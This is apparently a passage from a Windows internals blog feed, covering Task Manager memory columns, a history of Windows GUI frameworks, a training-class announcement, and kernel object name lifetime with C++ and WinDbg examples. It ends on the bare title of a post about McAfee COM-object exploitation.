A complication is hinted at when looking in the Details tab. The default memory-related column is named “Memory (Active Private Working Set)”, which seems more complex than simply “Memory”. Opening the list of columns from the Details tab shows more columns where the term “Memory” is used. What gives?

The Processes’ tab Memory column is the same as the Details’ tab Memory (active private working set). But what does it mean? Let’s break it down:

  • Working set – the memory is accessible by the processor with no page fault exception. Simply put, the memory is in RAM (physical memory).
  • Private – the memory is private to the process. This is in contrast to shared memory, which is (at least can be) shared with other processes. The canonical example of shared memory is PE images – DLLs and executables. A DLL that is mapped to multiple processes will (in most cases) have a single presence in physical memory.
  • Active – this is an artificial term used by Task Manager related to UWP (Universal Windows Platform) processes. If a UWP process’ window is minimized, this column shows zero memory consumption, because in theory, since all the process’ threads are suspended, that memory can be repurposed for other processes to use. You can try it by running Calculator, and minimizing its window. You’ll see this column showing zero. Restore the window, and it will show some non-zero value. In fact, there is a column named Memory (private working set), which shows the same thing but does not take into consideration the “active” aspect of UWP processes.

So what does all this mean? The fact that this column shows only private memory is a good thing. That’s because the shared memory size is (in most cases) not controllable and is fixed – for example, the size of a DLL is out of our control – the process just needs to use the DLL. The downside of this active private working set column is the fact that it only shows memory that is currently part of the process working set – in RAM. A process may allocate a large chunk of memory; most of it may not be in RAM right now, but it is still consumed, and counts towards the commit limit of the system.

Here is a simple example. I’m writing the following code to allocate (commit) 64 GB of memory:

auto ptr = VirtualAlloc(nullptr, 64LL << 30, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

Here is what Task manager shows in its Performance/Memory tab before the call:

“In Use” indicates current RAM (physical memory) usage – it’s 34.6 GB. The “Committed” part is more important – it indicates how much memory I can totally commit on the system, regardless of whether it’s in physical memory now or not. It shows “44/128 GB” – 44 GB are committed now (34.6 of that in RAM), and my commit limit is 128 GB (it’s the sum of my total RAM and the configured page files sizes). Here is the same view after I commit the above 64 GB:

Notice the physical memory didn’t change much, but the committed memory “jumped” by 64 GB, meaning there is now only 20 GB left for other processes to use before the system runs out of memory (or page file expansion occurs). Looking at the Details tab for this Test process shows the active private working set column indicating very low memory consumption, because it’s looking at private RAM usage only:

Only when the process starts “touching” (using) the committed memory, physical pages will start being used by the process. The name “committed” indicates the commitment of the system to providing that entire memory block if required no matter what.
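
As a minimal sketch continuing the VirtualAlloc example above (not part of the original snippet), touching some of the committed region forces physical pages to be materialized, so the private working set grows while the commit size stays at 64 GB:

if (ptr) {
	// access the first 1 GB - pages are brought into RAM on first touch
	memset(ptr, 0, 1LL << 30);
}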

Where is that 64 GB shown? The column to use in Task Manager is called Commit Size, which is in fact private committed memory:

Commit Size is the correct column to look at when trying to ascertain memory consumption in processes. The sad thing is that it’s not the default column shown, and that’s why many people use the misleading active private working set column. My guess is that the misleading column is shown by default because physical memory is easy to understand for most people, whereas virtual memory (some of which is in RAM and some of which is not) is not as trivially understood.

Comparing Commit Size to active private working set sometimes reveals a big difference – an indication that most of the private memory of a process is not in RAM right now, but that memory is still consumed as far as the memory manager is concerned.

A related confusion exists because of different terminology used by different tools. Specifically, Commit Size in Task Manager is called Private Bytes in Process Explorer and Performance Monitor.

Task Manager’s other memory columns allow you to look at more memory counters such as Working Set (total RAM used by a process, including private and shared memory), Peak Working Set, Memory (shared working set), and Working Set Delta.

There are other subtleties I am not expanding on in this post. Hopefully, I’ll touch on these in a future post.

Bottom line: Commit Size is the way to go.

The Quest for the Ultimate GUI Framework

22 April 2023 at 02:09

I love Graphical User Interfaces, especially the good ones 🙂 Some people feel more comfortable with a terminal and command line arguments – I prefer a graphical representation, especially when visualization of information can be much more effective than text (even if colorful).

Most of the tools I write are GUI tools; I like colors and graphics – computers are capable of so much graphic and visualization power – why not see it in all its glory? GUIs are not a silver bullet by any means. Sometimes bad GUIs are encountered, which might send the user to the command terminal. I’m not going to discuss here what makes up a good GUI. This post is about technologies to create GUIs.

Disclaimer: much of the rest of this post is subjective – my experience with Windows GUIs. I’m also not discussing web UI – not really in the same scope. I’m interested in taking advantage of the machine, not being constrained or affected by some browser or HTML/CSS/JS engine. The discussion is not exhaustive, either; there is a limit to a post 🙂

In the old days, the Win32 User Interface reigned supreme. It was created in the days when memory was scarce, colors were few, hardware acceleration did not exist, and consistency was the name of the game. Modern GUIs were just starting to come up.

Windows supports all the standard controls (widgets) a typical GUI application would need. From buttons and menus, to list views and tree views, to edit controls, the standard set of typical application usage was covered. The basis of the Win32 GUI model was (and still is) the mighty Handle to a Window (HWND). This entity represented the surface on which the window (typically a control) would render its graphical representation and handle its interaction logic. This worked fairly well throughout the 1990s and early 2000s.

The model was not perfect, by any means. Customizing controls was difficult, and in some cases downright impossible. Built-in customization was minimal; any substantial customization required subclassing – essentially taking control of handling some window messages differently, in the hope of not breaking integration with the default message processing. It was a lot of work at best, and imperfect or impossible at worst. Messages like WM_PAINT and WM_ERASEBKGND were commonly overridden, but also mouse and keyboard-related messages. In some cases, there was no good option for customization and a full-blown control had to be written from scratch.

Here is a simple example: say you want to change the background color of a button. This should in theory be simple – change some property and you’re done. Not so easy with the Win32 button – it had to be owner-drawn or custom-drawn (WM_CUSTOMDRAW) in later versions of Windows. And that’s really a simple example.
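
As an illustration, here is a minimal sketch of the owner-drawn route (IDC_MYBUTTON, hParentWnd, hInstance and the color are made-up placeholders for this example):

// Button created with BS_OWNERDRAW so the parent receives WM_DRAWITEM:
//   CreateWindow(L"BUTTON", L"Click Me", WS_CHILD | WS_VISIBLE | BS_OWNERDRAW,
//       10, 10, 100, 30, hParentWnd, (HMENU)(INT_PTR)IDC_MYBUTTON, hInstance, nullptr);

// Called from the parent's WM_DRAWITEM handler to paint the entire button face.
void DrawMyButton(DRAWITEMSTRUCT* dis) {
    HBRUSH brush = ::CreateSolidBrush(RGB(200, 60, 60));   // the desired "background color"
    ::FillRect(dis->hDC, &dis->rcItem, brush);
    ::DeleteObject(brush);
    ::SetBkMode(dis->hDC, TRANSPARENT);
    ::DrawText(dis->hDC, L"Click Me", -1, &dis->rcItem,
        DT_CENTER | DT_VCENTER | DT_SINGLELINE);
}

Note that nothing here is a simple property on the button: the parent takes over drawing entirely (and would also need to render the focused and pressed states), all to change a background color.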

Layout didn’t really exist. Controls were placed at an (x,y) coordinate measured from the top-left corner of the parent window – in pixels, mind you – with a specified width and height. There were no “panels” to handle more complex layout, in a grid for example, horizontally, or vertically, etc.

From a programmatic perspective, working directly with the Windows GUI API was no picnic either. Microsoft realized this, and developed The Microsoft Foundation Classes (MFC) library in the early 1990s to make working with Win32 GUI somewhat easier, by wrapping some of the functionality in C++ classes, and adding some nice features like docking windows. MFC was very popular at the time, as it was easier to use when getting started with building GUIs. It didn’t solve anything fundamental, as it was just using the Win32 GUI API under the covers. Several third-party libraries were written on top of MFC to provide even more functionality out of the box. MFC can still be used today, with Visual Studio still providing wizards and other helpers for MFC developers.

MFC wasn’t perfect of course. Beyond the obvious usage of the Win32 UI controls, it was fairly bloated, dragging with it a large DLL or adding a big static chunk if linked statically. Another library came out, the Windows Template Library (WTL), that provided a thin layer around the Windows GUI API, based on template classes, meaning that there was no “runtime” in the same sense as MFC – no library to link with – just whatever is compiled directly.

Personally, I like WTL a lot. In fact, my tools in recent years use WTL exclusively. It’s much more flexible than MFC, and doesn’t impose a particular way of working as MFC strongly did. The downside is that WTL wasn’t an official Microsoft library, mostly developed by good people inside the company in their spare time. Visual Studio has no special support for WTL. That said, WTL is still being maintained, and had some incremental features added throughout the years.

At the same time as MFC and WTL were used by C++ developers, another mighty tool entered the scene: Visual Basic. This environment was super successful for two primary reasons:

  • The programming language was based on BASIC, which many people had at least some acquaintance with, as it was the most common programming language for personal computers in the 1980s and early 1990s.
  • The “Visual” aspect of Visual Basic was new and compelling. Just drag controls from a toolbox onto a surface, change properties in the designer and/or at runtime, connect to events easily, and you’re good to go.

To this day, I sometimes encounter customers and applications still built with Visual Basic 6, even though its official support date is long gone.

The .NET Era

Around 2002, .NET and C# were introduced by Microsoft as a response to the Java language and ecosystem that came out in 1995. With .NET, the Windows Forms (WinForms) library was provided, which was very similar to the Visual Basic experience, but with the more modern and powerful .NET Framework. And with .NET 2 in 2005, when .NET really kicked in (generics and other important features were released), Windows Forms became the go-to UI framework, while Visual Basic’s popularity was waning.

However, WinForms was still based around the Win32 GUI model – HWNDs, no easy customization, etc. That said, Microsoft did a lot of work to make WinForms more customizable than pure Win32 or MFC by subclassing many of the existing controls and adding functionality available with simple properties. Support was added to customize menus with colors and icons, buttons with images and custom colors, and more. The drag-n-drop experience from Visual Basic was available as well, making it relatively easy to migrate from Visual Basic.

.NET 3 and WPF

The true revolution came in 2006 when .NET 3 was released. .NET 3 had 3 new technologies that were greatly advertised:

  • Windows Presentation Foundation (WPF)
  • Windows Communication Foundation (WCF)
  • Windows Workflow Foundation (WF)

WCF was hugely successful, and took over older technologies as it unified all types of communications, whether based on remoting, HTTP, sockets, or whatever. WF had only moderate success.

WPF was the new UI framework, and it was revolutionary. WPF ditched the Win32 UI model – a WPF “main” window still had an HWND – you can’t get away with that – but all the controls were drawn by WPF – the Win32 UI controls were not used. From Win32’s perspective there was just one HWND. Compare that to Win32 UI model, where every control is an HWND – buttons, list boxes, list views, toolbars, etc.

With the HWND restrictions gone, WPF used DirectX for rendering purposes, compared to the aging Graphics Device Interface (GDI) API used by Win32 GUIs. Without the artificial boundaries of HWNDs, WPF could do anything – combine anything – 2D, 3D, animation, media, unlimited customization – without any issues, as the entire HWND surface belonged to WPF.

I remember when I was introduced to WPF (at that time code name “Avalon”) – I was blown away. It was a far cry from the old, predictable, non-customizable model of Win32 GUIs.

WPF wasn’t just about the graphics and visuals. It also provided powerful data binding, much more powerful than the limited model supported by WinForms. I would even go so far as to say it’s one of the most important of WPF’s features. WPF introduced XAML – an XML-based language to declaratively build UIs, with object creation, properties, and even declarative data binding. Customizing controls could be done in several ways, including existing properties, control templates and data templates. WPF was raw power.

So, is WPF the ultimate GUI framework? It certainly looked like a prime candidate.

WPF made progress, ironing out issues and adding some features in .NET 3.5 and .NET 4. But then it seemed to have ground to a halt. WPF got barely any improvements in .NET 4.5. One could say it was pretty complete, so perhaps there was nothing much to add?

One aspect of WPF not dealt with well was performance. WPF could be bogged down by many controls with complex data bindings – data bindings were mostly implemented with Reflection, a flexible but relatively slow .NET mechanism. There were certainly opportunities for improvement. Additionally, some controls were inherently slow, most notably the DataGrid, which was useful but problematic, as it was painfully slow. Third-party libraries came to the rescue and provided improved data grids of their own (most not free).

WPF had a strong following, with community created controls, and other goodies. Microsoft, however, seemed to have lost interest in WPF, the reason perhaps being the “Metro” revolution of 2012.

“Metro” and Going Universal

Windows 8 was a major release for Microsoft where UI is concerned. The “Metro” minimal design language was all the rage at the time. Touch devices started to appear and Microsoft did not want to lose the battle. I noticed that Microsoft tends to move from one extreme to another, finally settling somewhere in the middle – but that usually takes years. Windows 8 is a perfect example. Metro applications (as they were called at the time) were always full screen – even on desktops with big displays. A new framework was built, based around the Windows Runtime – a new library based on the old but trusty Component Object Model (COM), with metadata in the .NET metadata format.

The Windows Runtime UI model was built on similar principles as WPF – XAML (not the same one, mind you; that would be too easy), data binding, control templates, and other similar (but simplified) concepts from WPF. The Windows Runtime was internally built in C++, with “convenient” language projections provided out of the box for C++ (C++/CX at the time), .NET (C# and VB), and even JavaScript.

Generally, Windows 8 and the Universal applications (as they were later renamed) were pretty terrible. The “Metro design language”, with its monochromatic, simplistic icons and graphics, was ridiculous. Colors were gone. I felt like I was sliding back to the 1980s, when colors were limited. This “Metro” style spread everywhere as far as Microsoft is concerned. For example, Visual Studio 2012, which was out at the time, was monochromatic – all icons in black only! It was a nightmare. Microsoft’s explanation was “to focus the developer attention on the code, remove distractions”. In actuality, it failed miserably. I remember the control toolbox for WinForms and WPF in VS 2012 – all icons were gray – there was just no way to distinguish between them at a glance – which destroys the point of having icons in the first place. Microsoft boasted that their designers managed to make all these once-colorful icons with a single color! What an achievement.

With Visual Studio 2013, they started to bring some colors back… the whole thing was so ridiculous.

The “Universal” model was created at least in part to address the problem of creating applications with the same code for Windows 8 and Windows Phone 8. To that end, it was successful, as the Win32 GUI was not implemented on Windows Phone, presumably because it was outdated, with lots and lots of code that is not well-suited to a small, much less powerful form factor like the phone and other small devices.

Working with Universal applications (now called Universal Windows Platform applications) was similar to WPF to some extent, but the controls were geared towards touch devices, where fingers are mostly used. Controls were big, and list views scrolled smoothly but showed very few lines of content. For desktop applications, it was a nightmare. Not to mention that Windows 7 (still very popular at the time) was not supported.

WPF was still the best option in the Microsoft space at the time, even though it stagnated. At least it worked on Windows 7, and its default control rendering was suited to desktop applications.

Windows 8.1 made some improvements in Universal apps – at least a minimize button was added! Windows 10 fixed the Universal fiasco by allowing windows to be resized normally like in the “old” days. There was a joke at the time saying that “Windows 10 returned windows to Windows. Before that it was Window – singular”.

That being said, Windows 10’s own UI was heavily influenced by Metro. The Settings app uses monochrome icons – how can anyone think this is better than colorful icons for easy recognition? This trend continues with Windows 11, where various classic windows are “converted” to the new “design language”. At least the Settings app uses somewhat colorful icons on Windows 11.

Universal apps could only run as a single instance, something that has since changed, but is still employed. For example, the Settings app in Windows 10 and 11 is single-instance. Why on earth should it be, in an OS named “Windows”? Give me more than one Settings window at a time!

Current State of Affairs

WPF is not moving forward. With the introduction of .NET Core (later renamed to simply .NET), WPF was open sourced, and is available in .NET 5+. It’s not cross-platform, though, unlike most of the other .NET 5+ pieces.

UWP is a failure, even Microsoft admits that. It’s written in C++ (it’s based on the Windows Runtime after all), which should give it good performance, not bogged down by .NET’s garbage collector and such. But its C++ projection is awful, and in my opinion unusable. If you create a new UWP application with C++ in Visual Studio, you’ll get plenty of files, including IDL (Interface Definition Language) files and some generated files – and all that for a single button in a window. I tried writing something more complex, and gave up. It’s too slow and convoluted. The only real option is to use .NET – something I may not want to do with all its dependencies and overhead.

Regardless, the controls’ default look and feel is geared towards touch devices. I don’t care about the little animations – I want to be able to use a proper list view. For example, the new Windows 11 Task Manager, which is built with the new WinUI technology (described next), uses the classic Win32 list view – because it’s fast and appropriate for this kind of tool. The rest is WinUI – the tabs are gone, there are monochromatic icons – it’s just ridiculous. WinUI adds nothing except a dark theme option.

Task manager in Windows 11

The WinUI technology is similar to UWP in concept and implementation. The current state of UI affairs is messy – there is WinUI, UWP, and .NET MAUI (to replace Xamarin, targeting mobile devices but not only) – what are people supposed to use?

All these UI libraries don’t really cater for desktop apps. This is why I’m still using WTL (which is wrapping the Win32 classic GUI API). There is no good alternative from Microsoft.

But perhaps not all is lost – Avalonia is a fairly new library attempting to bring WPF-style UI and capabilities to more than just Windows. It’s not a Microsoft library, though – it’s built by people in the community as open source – so there is no telling whether at some point it will stop being supported. Then again, WPF – a Microsoft library – stopped being supported.

Other Libraries

At this point you may be wondering why use a Microsoft library at all for desktop GUI – Microsoft has dropped the ball, as they continue to make a mess. Maybe use Blazor on the desktop? Out of scope for this post.

There are other options: many GUI libraries that use C or C++ exist – wxWidgets, GTK, and Qt, to name a few. wxWidgets supports Windows fairly well. Installing GTK successfully is a nightmare. Qt is very powerful and takes control of drawing everything, similar to the WPF model. It has powerful tools for designing GUIs, with its own declarative language based on JavaScript. With Qt you also have to use its own classes for non-UI stuff, like strings and lists. It’s also pricey for closed-source use.

Another alternative which has a lot of promise (some of which is already delivered) is Dear ImGui. This library is different from most others, as it’s an Immediate Mode GUI, rather than Retained Mode, which most others are. It’s cross-platform, very flexible, and fast. Just look at some of the GUIs built with it – truly impressive.
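
As a tiny sketch of what immediate-mode code looks like (g_processNames and RefreshProcessList are hypothetical application data and helpers; window and renderer backend setup is omitted):

#include "imgui.h"
#include <string>
#include <vector>

// Hypothetical application data and refresh helper.
extern std::vector<std::string> g_processNames;
void RefreshProcessList();

// Called once per frame, between the backend NewFrame calls and ImGui::Render().
// There is no retained widget tree: the UI is rebuilt from this code every frame,
// and interaction results come back directly as return values.
void DrawProcessWindow() {
    ImGui::Begin("Processes");
    static int selected = -1;
    for (int i = 0; i < (int)g_processNames.size(); i++) {
        if (ImGui::Selectable(g_processNames[i].c_str(), selected == i))
            selected = i;    // clicked this frame
    }
    if (ImGui::Button("Refresh"))
        RefreshProcessList();
    ImGui::End();
}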

I’ll probably migrate to using ImGui. Is it the ultimate GUI framework? Not yet, but I feel it’s the closest to attaining that goal. A couple of years back I implemented a mini Process Explorer-like tool with ImGui. Its list view is flexible and rich, and the library in general gets better all the time. It has great support from the authors and the community. It’s not perfect yet; there are still rough edges, and in some cases you have to work harder because of its cross-platform nature.

I should also mention Uno Platform, another cross-platform UI framework built on top of .NET, that made great strides in recent years.

What’s Next?

Microsoft has dropped the ball on desktop apps. The Win32 classic model is not being maintained. Just try to create a “dark mode” UI. I did that to some extent for the Sysinternals tools at the time. It was hard. Some things I just couldn’t do right – the scrollbars that are attached to list views and tree views, for example.

Prior to common controls version 6 (Vista), Microsoft had a “flat scroll bars” feature that allowed customization of scrollbars fairly easily (colors, for example). But surprisingly, common controls version 6 dropped this feature! Flat scroll bars are no longer supported. I had to go through hoops to implement dark scroll bars for Sysinternals – and even that was imperfect.

In my own tools, I created a theme engine as well – implemented differently – and I decided to forgo customizing scroll bars. Let them remain as is – it’s just too difficult and fragile.

I do hope Microsoft changes something in the way they look at desktop apps. This is where most Windows users are! Give us WPF in C++. Or enhance the Win32 model. The current UI mess is not helping, either.

I’m going to set some time to work on building some tools that use Dear ImGui – I feel it has the most bang for the buck.

Upcoming Training Classes for June & July

23 April 2023 at 20:27

I’m happy to announce 3 upcoming remote training classes to be held in June and July.

Windows System Programming

This is a 5-day class, split into 10 half-days. The syllabus can be found here.

All times are 11am to 3pm ET (8am to 12pm, PT) (4pm to 8pm, London time)

June: 7, 8, 12, 14, 15, 19, 21, 22, 26, 28

Cost: 950 USD if paid by an individual, 1900 USD if paid by a company.

COM Programming

This is a 3-day course, split into 6 half-days. The syllabus can be found here.

All times are 11am to 3pm ET (8am to 12pm, PT) (4pm to 8pm, London time)

July: 10, 11, 12, 17, 18, 19

Cost: 750 USD (if paid by an individual), 1500 USD if paid by a company.

x64 Architecture and Programming

This is a brand new 3-day class, split into 6 half-days, that covers the x64 processor architecture, programming in general, and programming in the context of Windows. The syllabus is not finalized yet, but it will cover at least the following topics:

  • General architecture and brief history
  • Registers
  • Addressing modes
  • Stand-alone assembly programs
  • Mixing assembly with C/C++
  • MSVC compiler-generated assembly
  • Operating modes: real, protected, long (+paging)
  • Major instruction groups
  • Macros
  • Shellcode
  • BIOS and assembly

July: 24, 25, 26, 31, August: 1, 2

Cost: 750 USD (if paid by an individual), 1500 USD if paid by a company.

Registration

If you’d like to register, please send me an email to [email protected] and provide the name of the training class of interest, your full name, company (if any), preferred contact email, and your time zone. Previous participants in my classes get 10% off. If you register for more than one class, the second (and third) are 10% off as well.

The sessions will be recorded, so you can watch any part you may be missing, or that may be somewhat overwhelming in “real time”.

As usual, if you have any questions, feel free to send me an email, or DM on twitter (@zodiacon) or Linkedin (https://www.linkedin.com/in/pavely/).

Kernel Object Names Lifetime

14 May 2023 at 21:51

Much of the Windows kernel functionality is exposed via kernel objects. Processes, threads, events, desktops, semaphores, and many other object types exist. Some object types can have string-based names, which means they can be “looked up” by that name. In this post, I’d like to consider some subtleties that concern object names.

Let’s start by examining kernel object handles in Process Explorer. When we select a process of interest, we can see the list of handles in one of the bottom views:

Handles view in Process Explorer

However, by default, Process Explorer shows only handles to what it considers named objects. But even that is not quite right: you will find certain object types in this view that don’t have string-based names. The simplest example is processes. Processes have numeric IDs, rather than string-based names. Still, Process Explorer shows processes with a “name” that shows the process executable name and its unique process ID. This is useful information, for sure, but it’s not the object’s name.

Same goes for threads: these are displayed, even though threads (like processes) have numeric IDs rather than string-based names.

If you wish to see all handles in a process, you need to check the menu item Show Unnamed Handles and Mappings in the View menu.

Object Name Lifetime

What is the lifetime associated with an object’s name? This sounds like a weird question. Kernel objects are reference counted, so obviously when an object reference count drops to zero, it is destroyed, and its name is deleted as well. This is correct in part. Let’s look a bit deeper.

The following example code creates a Notepad process, and puts it into a named Job object (error handling omitted for brevity):

PROCESS_INFORMATION pi;
STARTUPINFO si = { sizeof(si) };

WCHAR name[] = L"notepad";
::CreateProcess(nullptr, name, nullptr, nullptr, FALSE, 0, 
	nullptr, nullptr, &si, &pi);

HANDLE hJob = ::CreateJobObject(nullptr, L"MyTestJob");
::AssignProcessToJobObject(hJob, pi.hProcess);

After running the above code, we can open Process Explorer, locate the new Notepad process, double-click it to get to its properties, and then navigate to the Job tab:

We can clearly see the job object’s name, prefixed with “\Sessions\1\BaseNamedObjects”, because simple object names (like “MyTestJob”) are prepended with a session-relative directory name, making the name unique to this session only. This means processes in other sessions can create objects with the same name (“MyTestJob”) without any collision. Further details on names and sessions are outside the scope of this post.
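
As a quick illustration, prefixing the name with Global\ would place the object in the session-independent directory instead, making it visible to all sessions:

// Creates the job directly under \BaseNamedObjects, shared across sessions
// (some object types require SeCreateGlobalPrivilege to be created there).
HANDLE hGlobalJob = ::CreateJobObject(nullptr, L"Global\\MyTestJob");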

Let’s see what the kernel debugger has to say regarding this job object:

lkd> !process 0 1 notepad.exe
PROCESS ffffad8cfe3f4080
    SessionId: 1  Cid: 6da0    Peb: 175b3b7000  ParentCid: 16994
    DirBase: 14aa86d000  ObjectTable: ffffc2851aa24540  HandleCount: 233.
    Image: notepad.exe
    VadRoot ffffad8d65d53d40 Vads 90 Clone 0 Private 524. Modified 0. Locked 0.
    DeviceMap ffffc28401714cc0
    Token                             ffffc285355e9060
    ElapsedTime                       00:04:55.078
    UserTime                          00:00:00.000
    KernelTime                        00:00:00.000
    QuotaPoolUsage[PagedPool]         214720
    QuotaPoolUsage[NonPagedPool]      12760
    Working Set Sizes (now,min,max)  (4052, 50, 345) (16208KB, 200KB, 1380KB)
    PeakWorkingSetSize                3972
    VirtualSize                       2101395 Mb
    PeakVirtualSize                   2101436 Mb
    PageFaultCount                    4126
    MemoryPriority                    BACKGROUND
    BasePriority                      8
    CommitCharge                      646
    Job                               ffffad8d14503080

lkd> !object ffffad8d14503080
Object: ffffad8d14503080  Type: (ffffad8cad8b7900) Job
    ObjectHeader: ffffad8d14503050 (new version)
    HandleCount: 1  PointerCount: 32768
    Directory Object: ffffc283fb072730  Name: MyTestJob

Clearly, there is a single handle to the job object. The PointerCount value is not the real reference count because of the kernel’s tracking of the number of usages each handle has (outside the scope of this post as well). To get the real reference count, we can click the PointerCount DML link in WinDbg (the !trueref command):

kd> !trueref ffffad8d14503080
ffffad8d14503080: HandleCount: 1 PointerCount: 32768 RealPointerCount: 3

We have a reference count of 3, and since we have one handle, it means there are two references somewhere to this job object.

Now let’s see what happens when we close the job handle we’re holding:

::CloseHandle(hJob);

Reopening the Notepad’s process properties in Process Explorer shows this:

Running the !object command again on the job yields the following:

lkd> !object ffffad8d14503080
Object: ffffad8d14503080  Type: (ffffad8cad8b7900) Job
    ObjectHeader: ffffad8d14503050 (new version)
    HandleCount: 0  PointerCount: 1
    Directory Object: 00000000  Name: MyTestJob

The handle count dropped to zero because we closed our (only) existing handle to the job. The job object’s name seems to be intact at first glance, but not really: the directory object is NULL, which means the object’s name is no longer visible in the object manager’s namespace.

Is the job object alive? Clearly, yes, as the pointer (reference) count is 1. When the handle count is zero, the PointerCount is the correct reference count, and there is no need to run the !trueref command. At this point, you should be able to guess why the object is still alive, and where that one reference is coming from.

If you guessed “the Notepad process”, then you are right. When a process is added to a job, it adds a reference to the job object so that it remains alive if at least one process is part of the job.

We, however, have lost the only handle we have to the job object. Can we get it back knowing the object’s name?

hJob = ::OpenJobObject(JOB_OBJECT_QUERY, FALSE, L"MyTestJob");

This call fails, and GetLastError returns 2 (“the system cannot find the file specified”, which in this case is the job object’s name). This means that the object name is destroyed when the last handle of the object is closed, even if there are outstanding references on the object (the object is alive!).

The job object example is just that: an example. The same rules apply to any named object.

Is there a way to “preserve” the object name even if all handles are closed? Yes, it’s possible if the object is created as “Permanent”. Unfortunately, this capability is not exposed by the Windows API functions like CreateJobObject, CreateEvent, and all other create functions that accept an object name.

Quick update: The native NtMakePermanentObject can make an object permanent given a handle, if the caller has the SeCreatePermanent privilege. This privilege is not granted to any user/group by default.
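
For illustration, a minimal user-mode sketch (assuming the token actually holds SeCreatePermanentPrivilege; the NtMakePermanentObject declaration is based on unofficial native API headers):

#include <Windows.h>
#include <winternl.h>

// Not declared in the SDK headers - unofficial native API declaration (assumption).
// Link with ntdll.lib or resolve the function with GetProcAddress.
extern "C" NTSTATUS NTAPI NtMakePermanentObject(HANDLE Handle);

bool MakeObjectPermanent(HANDLE hObject) {
    // Enable SeCreatePermanentPrivilege in the current token
    // (the privilege must be present in the token to begin with).
    HANDLE hToken;
    if (!::OpenProcessToken(::GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken))
        return false;

    TOKEN_PRIVILEGES tp{};
    tp.PrivilegeCount = 1;
    tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    ::LookupPrivilegeValue(nullptr, SE_CREATE_PERMANENT_NAME, &tp.Privileges[0].Luid);
    ::AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), nullptr, nullptr);
    bool enabled = ::GetLastError() == ERROR_SUCCESS;   // ERROR_NOT_ALL_ASSIGNED means the privilege is missing
    ::CloseHandle(hToken);
    if (!enabled)
        return false;

    // Mark the object permanent, so its name survives the last handle close.
    return ::NtMakePermanentObject(hObject) >= 0;        // NT_SUCCESS equivalent
}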

A permanent object can be created with kernel APIs, where the flag OBJ_PERMANENT is specified as one of the attribute flags part of the OBJECT_ATTRIBUTES structure that is passed to every object creation API in the kernel.

A “canonical” kernel example is the creation of a callback object. Callback objects are only usable in kernel mode. They provide a way for a driver/kernel to expose notifications in a uniform way, and allow interested parties (drivers/kernel) to register for notifications based on that callback object. Callback objects are created with a name so that they can be looked up easily by interested parties. In fact, there are quite a few callback objects on a typical Windows system, mostly in the Callback object manager namespace:

Most of the above callback objects’ usage is undocumented, except three which are documented in the WDK (ProcessorAdd, PowerState, and SetSystemTime). The following code creates a callback object, but the name disappears immediately, as the ExCreateCallback API returns an object pointer rather than a handle:

PCALLBACK_OBJECT cb;
UNICODE_STRING name = RTL_CONSTANT_STRING(L"\\Callback\\MyCallback");
OBJECT_ATTRIBUTES cbAttr = RTL_CONSTANT_OBJECT_ATTRIBUTES(&name, 
    OBJ_CASE_INSENSITIVE);
status = ExCreateCallback(&cb, &cbAttr, TRUE, TRUE);

The correct way to create a callback object is to add the OBJ_PERMANENT flag:

PCALLBACK_OBJECT cb;
UNICODE_STRING name = RTL_CONSTANT_STRING(L"\\Callback\\MyCallback");
OBJECT_ATTRIBUTES cbAttr = RTL_CONSTANT_OBJECT_ATTRIBUTES(&name, 
    OBJ_CASE_INSENSITIVE | OBJ_PERMANENT);
status = ExCreateCallback(&cb, &cbAttr, TRUE, TRUE);

A permanent object must be made “temporary” (the opposite of permanent) before actually dereferencing it by calling ObMakeTemporaryObject.
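
For example, a driver’s cleanup path could look like this (a sketch, assuming cb is the callback object created above):

// Remove the permanent flag so the object can actually go away,
// then drop the reference returned by ExCreateCallback.
ObMakeTemporaryObject(cb);
ObDereferenceObject(cb);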

Aside: Getting to an Object’s Name in WinDbg

For those who wonder how to locate an object’s name given its address: I hope it’s clear enough… (watch the bold text).

lkd> !object ffffad8d190c0080
Object: ffffad8d190c0080  Type: (ffffad8cad8b7900) Job
    ObjectHeader: ffffad8d190c0050 (new version)
    HandleCount: 1  PointerCount: 32770
    Directory Object: ffffc283fb072730  Name: MyTestJob
lkd> dt nt!_OBJECT_HEADER ffffad8d190c0050
   +0x000 PointerCount     : 0n32770
   +0x008 HandleCount      : 0n1
   +0x008 NextToFree       : 0x00000000`00000001 Void
   +0x010 Lock             : _EX_PUSH_LOCK
   +0x018 TypeIndex        : 0xe9 ''
   +0x019 TraceFlags       : 0 ''
   +0x019 DbgRefTrace      : 0y0
   +0x019 DbgTracePermanent : 0y0
   +0x01a InfoMask         : 0xa ''
   +0x01b Flags            : 0 ''
   +0x01b NewObject        : 0y0
   +0x01b KernelObject     : 0y0
   +0x01b KernelOnlyAccess : 0y0
   +0x01b ExclusiveObject  : 0y0
   +0x01b PermanentObject  : 0y0
   +0x01b DefaultSecurityQuota : 0y0
   +0x01b SingleHandleEntry : 0y0
   +0x01b DeletedInline    : 0y0
   +0x01c Reserved         : 0
   +0x020 ObjectCreateInfo : 0xffffad8c`d8e40cc0 _OBJECT_CREATE_INFORMATION
   +0x020 QuotaBlockCharged : 0xffffad8c`d8e40cc0 Void
   +0x028 SecurityDescriptor : 0xffffc284`3dd85eae Void
   +0x030 Body             : _QUAD
lkd> db nt!ObpInfoMaskToOffset L10
fffff807`72625e20  00 20 20 40 10 30 30 50-20 40 40 60 30 50 50 70  .  @.00P @@`0PPp
lkd> dx (nt!_OBJECT_HEADER_NAME_INFO*)(0xffffad8d190c0050 - ((char*)0xfffff807`72625e20)[(((nt!_OBJECT_HEADER*)0xffffad8d190c0050)->InfoMask & 3)])
(nt!_OBJECT_HEADER_NAME_INFO*)(0xffffad8d190c0050 - ((char*)0xfffff807`72625e20)[(((nt!_OBJECT_HEADER*)0xffffad8d190c0050)->InfoMask & 3)])                 : 0xffffad8d190c0030 [Type: _OBJECT_HEADER_NAME_INFO *]
    [+0x000] Directory        : 0xffffc283fb072730 [Type: _OBJECT_DIRECTORY *]
    [+0x008] Name             : "MyTestJob" [Type: _UNICODE_STRING]
    [+0x018] ReferenceCount   : 0 [Type: long]
    [+0x01c] Reserved         : 0x0 [Type: unsigned long]

Discovering and exploiting McAfee COM-objects (CVE-2021-23874)

17 May 2021 at 23:00

0x00: Introduction

